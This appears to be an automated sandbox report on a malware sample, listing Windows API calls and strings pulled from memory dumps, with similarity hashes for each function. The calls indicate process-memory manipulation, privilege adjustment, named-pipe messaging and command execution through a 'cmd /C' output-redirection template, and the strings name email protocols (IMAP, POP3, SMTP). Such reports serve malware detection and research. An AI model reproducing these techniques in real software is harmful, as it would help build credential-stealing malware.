  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 1
  • API ID: HeapFree$GetTickCountRtlAllocateHeap$QueryPerformanceCounterQueryPerformanceFrequencyRtlEnterCriticalSectionRtlLeaveCriticalSectionStrTrim_aulldivlstrcpy
  • String ID:
  • API String ID: 2502196733-0
  • Opcode ID: af5c98305472d103a45b2540159c41f58267bab1f426382dbe25329856732327
  • Instruction ID: 245f3b5a859ad928aa4cb327569d8433b77dc68c1aea4cbcf243a63b81ac7fdd
  • Opcode Fuzzy Hash: 40317033188AC386C62778D245A67BCDD44BF811E684D5716ED08B418DAF8722E77F1A
  • Instruction Fuzzy Hash: 245f3b5a859ad928aa4cb327569d8433b77dc68c1aea4cbcf243a63b81ac7fdd
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
  • GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
  • QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
  • QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
  • _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001D9192: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,001DDF8D), ref: 001D919B
    • Part of subcall function 001D9192: _aulldiv.NTDLL(?,001DDF8D,00989680,00000000), ref: 001D91BB
    • Part of subcall function 001DD6F0: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD70C
    • Part of subcall function 001DD6F0: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD72A
  • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
  • GetTickCount.KERNEL32 ref: 001DDCFC
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DD9CB: strcpy.NTDLL ref: 001DDA09
    • Part of subcall function 001DD9CB: lstrcat.KERNEL32(00000000,?), ref: 001DDA14
    • Part of subcall function 001DD9CB: StrTrimA.SHLWAPI(00000000,001E747C), ref: 001DDA31
  • StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001D955B: lstrcpy.KERNEL32(00000000,?), ref: 001D9586
    • Part of subcall function 001D955B: lstrcat.KERNEL32(00000000,?), ref: 001D9591
  • lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
  • HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
  • HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
  • HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 1
  • API ID: HeapFree$lstrcat$RtlAllocateHeap$StrTrimlstrcpy
  • String ID:
  • API String ID: 2176245286-0
  • Opcode ID: e358d8d67c30f9e67b4615eb8f19913a0addd12755002ea1bba3c3ca2f9fd4df
  • Instruction ID: 8fbef3a02343e44f8b833e415adb96bb5717882f7b287c29abc605180dd9e952
  • Opcode Fuzzy Hash: 19317C33288A01C6822764C646E977DFD09FF811E990E6B16EE457404D2EC30AF5BF7A
  • Instruction Fuzzy Hash: 8fbef3a02343e44f8b833e415adb96bb5717882f7b287c29abc605180dd9e952
APIs
  • RtlAllocateHeap.NTDLL ref: 001DDEA1
  • lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DD6F0: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD70C
    • Part of subcall function 001DD6F0: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD72A
    • Part of subcall function 001D9192: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,001DDF8D), ref: 001D919B
    • Part of subcall function 001D9192: _aulldiv.NTDLL(?,001DDF8D,00989680,00000000), ref: 001D91BB
  • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DD9CB: strcpy.NTDLL ref: 001DDA09
    • Part of subcall function 001DD9CB: lstrcat.KERNEL32(00000000,?), ref: 001DDA14
    • Part of subcall function 001DD9CB: StrTrimA.SHLWAPI(00000000,001E747C), ref: 001DDA31
  • StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001D955B: lstrcpy.KERNEL32(00000000,?), ref: 001D9586
    • Part of subcall function 001D955B: lstrcat.KERNEL32(00000000,?), ref: 001D9591
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
  • lstrcat.KERNEL32(00000000,?), ref: 001DE06F
  • lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DFFD2: memset.NTDLL ref: 001E000B
    • Part of subcall function 001DFFD2: memcpy.NTDLL(00000084,00000084,?,00000000,00000000,?,?,00000000,?,?), ref: 001E0017
  • HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001CE1E5: lstrlen.KERNEL32(?,00000000,001E5128,00000000), ref: 001CE205
    • Part of subcall function 001CE1E5: wsprintfA.USER32 ref: 001CE22F
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
  • HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
  • HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
  • HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
  • HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 75
  • API ID: GetLastError$CloseHandleCreateFileCreateFileMappingGetFileSizeGetTickCountHeapFreelstrcpylstrlen
  • String ID: Local\
  • API String ID: 100657750-422136742
  • Opcode ID: f69422c415cb778fefbc06e8825fe91035b8cc03ac1a89af78bf0cef88205365
  • Instruction ID: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
  • Opcode Fuzzy Hash: 99F02E34B1854287E12374A1016077FDA04E7F20C4D8C7767ED453950A6F0278F7661B
  • Instruction Fuzzy Hash: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
APIs
  • GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
  • CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
    • Part of subcall function 001D937A: lstrlen.KERNEL32(00000000,00000000,?,00000027,?,001EB068,00000000), ref: 001D93B0
    • Part of subcall function 001D937A: lstrcpy.KERNEL32(00000000,00000000), ref: 001D93D4
    • Part of subcall function 001D937A: lstrcat.KERNEL32(00000000,00000000), ref: 001D93DC
  • GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
  • CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
  • lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
  • lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
  • HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
  • CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 36c43c169b7f4adfcc7eed8db55d242cf47c4c2cff2d35238d5400cc3024a577
  • Instruction ID: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
  • Opcode Fuzzy Hash: 93F078708B2E8BC1CD9158C9160535692C06F30E68E9C9B137824F966B6B20312C9F9D
  • Instruction Fuzzy Hash: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
APIs
  • memset.NTDLL ref: 01B32CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 01B32CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 01B32D14
  • lstrcpyW.KERNEL32(00000000,01B38224), ref: 01B32D29
  • lstrlen.KERNEL32(01B37494,?,?,?,?,?,?,?,?,?,?,01B318D7,?), ref: 01B32D46
  • lstrcpyW.KERNEL32(00000000,01B384B8), ref: 01B32D77
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • wsprintfW.USER32 ref: 01B32DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 01B32DE3
  • CoUninitialize.OLE32 ref: 01B32DF7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: GetLastError$WaitForSingleObject$ReleaseMutexlstrcpynmemcpymemset
  • String ID:
  • API String ID: 1576942631-0
  • Opcode ID: bbb80d9d18486b754104cd36c0130e3b39926c5d582aef500eb7a1e8a66222a2
  • Instruction ID: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
  • Opcode Fuzzy Hash: 4A217F33157A22D745163840C0507BEF482FB825E694CB711FE21722DE4A8197F6AFDD
  • Instruction Fuzzy Hash: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
APIs
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB4AE
  • memcpy.NTDLL(?,?,00000010), ref: 001DB4D1
  • memset.NTDLL ref: 001DB51D
  • lstrcpyn.KERNEL32(?,?,00000034), ref: 001DB531
  • GetLastError.KERNEL32 ref: 001DB55F
  • GetLastError.KERNEL32 ref: 001DB5A2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB5C1
  • WaitForSingleObject.KERNEL32(?,000927C0), ref: 001DB5FB
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001DB609
    • Part of subcall function 001DB350: memset.NTDLL ref: 001DB398
    • Part of subcall function 001DB350: QueueUserWorkItem.KERNEL32(001DAFC4,?,00000010), ref: 001DB439
    • Part of subcall function 001DB350: GetLastError.KERNEL32 ref: 001DB443
  • GetLastError.KERNEL32 ref: 001DB67E
  • ReleaseMutex.KERNEL32(?), ref: 001DB690
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: GetLastError$CloseHandleCreateFileGetModuleHandleGetWindowsDirectoryHeapFreeRtlAllocateHeapStrChrWriteFilewsprintf
  • String ID:
  • API String ID: 2627060994-0
  • Opcode ID: db8d6b5184187aba615ed9859a1217546e47d51c2a19850b1dde47917d77b9bd
  • Instruction ID: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
  • Opcode Fuzzy Hash: 00E05538564C02C3C4279AA888803BEDA41B3801C1E8E0212FA002A5BAAB0323C88F63
  • Instruction Fuzzy Hash: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
  • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
  • StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
  • wsprintfA.USER32 ref: 001C15D0
  • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
  • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
  • WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
  • GetLastError.KERNEL32 ref: 001C1615
  • CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
  • GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 1
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeapWriteFilelstrcpy
  • String ID: qwerty
  • API String ID: 1232246474-55151997
  • Opcode ID: 8025ce6979e3e0b730e9e5b5069bd5d5c92c7b34e4099fbe40c64fb372d3362f
  • Instruction ID: 17979a94517c5d7eaceea80456e78354db22995af431dd8f5d96e6019258e958
  • Opcode Fuzzy Hash: 5711597508468386902738E58072BBCD601BB525C8C8D2327F9487E60E3B57B0E5AF53
  • Instruction Fuzzy Hash: 17979a94517c5d7eaceea80456e78354db22995af431dd8f5d96e6019258e958
APIs
  • lstrcpy.KERNEL32(00000000,?), ref: 001C1046
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
  • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
  • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
  • CloseHandle.KERNEL32(00000000), ref: 001C1168
  • HeapFree.KERNEL32(00000000,?), ref: 001C1178
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
  • HeapFree.KERNEL32(00000000,?), ref: 001C11A3
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 8
  • API ID: CreateProcessGetExitCodeProcessGetLastErrorWaitForMultipleObjectslstrlenmemsetwcstombs
  • String ID: D$cmd /C "%s> %s1"
  • API String ID: 1537746708-2226621151
  • Opcode ID: 8f43a44b104833d0f96806934345d3a8753fb5f9a1b6580f8a9b41b9e07b006e
  • Instruction ID: 189f0c3c70cc7b6004f2ba7acf1b9f38675443b636e617586de16067a78319dd
  • Opcode Fuzzy Hash: 3EF0C02508CBD197D4C33468270174BEA16AF211D2C4D6B91A6806A1885F0075D2575B
  • Instruction Fuzzy Hash: 189f0c3c70cc7b6004f2ba7acf1b9f38675443b636e617586de16067a78319dd
APIs
  • memset.NTDLL ref: 001C743A
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
  • wcstombs.NTDLL ref: 001C747D
  • CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
  • GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
  • GetLastError.KERNEL32 ref: 001C7507
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 83
  • API ID: CloseHandleGetLastError$ConnectNamedPipeCreateEventDisconnectNamedPipeFlushFileBuffersWaitForMultipleObjectsWaitForSingleObject
  • String ID:
  • API String ID: 4178450735-0
  • Opcode ID: fea2056c6ced76e25bc66d29ae2c0ef00b9ab400e991bc076a25110f2a978033
  • Instruction ID: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
  • Opcode Fuzzy Hash: 34F07B324973A09BC12724748146BBA7A46FF612E7D8C7302ECB0B518E1F05A6F65369
  • Instruction Fuzzy Hash: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
APIs
  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001CBBD2
  • ConnectNamedPipe.KERNEL32(?,?), ref: 001CBC02
  • GetLastError.KERNEL32 ref: 001CBC0C
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CBC30
    • Part of subcall function 001CB978: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
    • Part of subcall function 001CB978: WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
    • Part of subcall function 001CB978: ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CB9DD
    • Part of subcall function 001CB978: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
    • Part of subcall function 001CB978: GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
    • Part of subcall function 001CB978: CancelIo.KERNEL32(?), ref: 001CBA27
    • Part of subcall function 001CB978: CloseHandle.KERNEL32(?), ref: 001CBA37
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CBA3F
  • CloseHandle.KERNEL32(?), ref: 001CBC9E
    • Part of subcall function 001CBB13: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CBB31
    • Part of subcall function 001CBB13: HeapFree.KERNEL32(00000000,00000000), ref: 001CBB84
  • FlushFileBuffers.KERNEL32(?), ref: 001CBC73
  • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 001CBC7C
  • WaitForSingleObject.KERNEL32(001EB094,00000000), ref: 001CBC89
  • GetLastError.KERNEL32 ref: 001CBCAB
  • CloseHandle.KERNEL32(?), ref: 001CBCB8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 23
  • API ID: LocalFreelstrcatlstrcpymemcpy
  • String ID: IMAP$P$POP3$SMTP
  • API String ID: 2001391702-3667654339
  • Opcode ID: 43434d26df3a4f5d7c34ecf30ecc38ca90c9099c92fdaea40e4787011e532f06
  • Instruction ID: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
  • Opcode Fuzzy Hash: 3911AF310449E3F79AAB229950026AB81429F117E2E5C9B21ED7C785CF6F03B14B770D
  • Instruction Fuzzy Hash: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
APIs
  • lstrcpyW.KERNEL32(00000000,001ED5A0), ref: 001DF84B
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001DF853
  • memcpy.NTDLL(00000000,?,00000000,-00000002), ref: 001DF8F1
  • LocalFree.KERNEL32(?,-00000002), ref: 001DF908
